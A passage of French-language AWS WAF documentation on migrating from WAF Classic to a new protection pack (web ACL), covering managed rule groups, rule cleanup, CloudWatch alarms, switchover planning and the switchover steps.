+ Les groupes de règles de base fournissent une protection générale contre une variété de menaces courantes, telles que l'arrêt de l'intégration des entrées erronées connues à votre application et l'interdiction d'accès à la page d'administration. 
+ Les groupes de règles spécifiques au cas d'utilisation offrent une protection incrémentielle pour de nombreux cas d'utilisation et environnements.
+ Les listes de réputation d'adresses IP fournissent des informations sur les menaces basées sur l'adresse IP source du client.

Pour de plus amples informations, veuillez consulter [AWS Règles gérées pour AWS WAF](aws-managed-rule-groups.md).

**Optimisation et nettoyage des règles**  
Réexaminez vos anciennes règles et optimisez-les en les réécrivant ou en supprimant celles qui sont obsolètes. Par exemple, si par le passé, vous avez déployé un AWS CloudFormation modèle tiré du document technique intitulé « Les 10 principales vulnérabilités des applications Web de l'OWASP », « [Prepare for the OWASP Top 10 Web Application Vulnerabilities Using » AWS WAF et de notre nouveau livre blanc](https://aws.amazon.com/blogs/aws/prepare-for-the-owasp-top-10-web-application-vulnerabilities-using-aws-waf-and-our-new-white-paper/), vous devriez envisager de le remplacer par des règles gérées. AWS Bien que le concept décrit dans le document soit toujours applicable et puisse vous aider à rédiger vos propres règles, les règles créées par le modèle ont été largement remplacées par les règles AWS gérées.

**CloudWatch Mesures et alarmes Amazon**  
Revoyez vos CloudWatch statistiques Amazon et configurez des alarmes selon vos besoins. La migration n'entraîne pas d'alarmes CloudWatch et il est possible que vos noms de métrique ne correspondent pas à vos besoins. 

**Examen avec votre équipe d'application**  
Collaborez avec votre équipe d'application et vérifiez votre niveau de sécurité. Découvrez quels champs sont analysés fréquemment par l'application et ajoutez des règles pour nettoyer l'entrée en conséquence. Recherchez les cas périphériques et ajoutez des règles pour intercepter ces cas si la logique métier de l'application ne les traite pas. 

**Planification du basculement**  
Planifiez le calendrier du commutateur avec votre équipe d'application. Le passage de l'ancienne association du pack de protection (ACL Web) à la nouvelle peut prendre un peu de temps pour se propager à toutes les zones où vos ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. Pendant ce temps, certaines demandes seront traitées par l'ancien pack de protection (ACL Web) et d'autres par le nouveau pack de protection (ACL Web). Vos ressources seront protégées tout au long du changement, mais il est possible que vous remarquiez des incohérences dans le traitement des demandes pendant le changement. 

Lorsque vous êtes prêt à basculer, suivez la procédure dans [Migration d'un pack de protection (ACL Web) : basculement](waf-migrating-procedure-switchover.md).

# Migration d'un pack de protection (ACL Web) : basculement
<a name="waf-migrating-procedure-switchover"></a>

Après avoir vérifié les paramètres de votre nouveau pack de protection (ACL Web), vous pouvez commencer à l'utiliser à la place de votre pack de protection AWS WAF classique (ACL Web). 

**Pour commencer à utiliser votre nouveau pack de AWS WAF protection (ACL Web)**

1. Associez le pack de AWS WAF protection (ACL Web) aux ressources que vous souhaitez protéger, en suivant les instructions de[Associer ou dissocier une protection à une ressource AWS](web-acl-associating-aws-resource.md). Cela dissocie automatiquement les ressources de l'ancien pack de protection (ACL Web). 

   La propagation du commutateur peut prendre de quelques secondes à plusieurs minutes. Pendant ce temps, certaines demandes peuvent être traitées par l'ancien pack de protection (ACL Web) et d'autres par le nouveau pack de protection (ACL Web). Vos ressources seront protégées tout au long du changement, mais vous remarquerez peut-être des incohérences dans le traitement des demandes jusqu'à ce qu'elles soient terminées. 

1. Configurez la journalisation pour le nouveau pack de protection (ACL Web), en suivant les instructions fournies à l'adresse[Trafic du pack de AWS WAF protection de journalisation (ACL Web)](logging.md). 

1. (Facultatif) Si votre pack de protection AWS WAF classique (ACL Web) n'est plus associé à aucune ressource, envisagez de le supprimer complètement de AWS WAF Classic. Pour plus d'informations, consultez [Suppression d'une liste ACL web](classic-web-acl-deleting.md).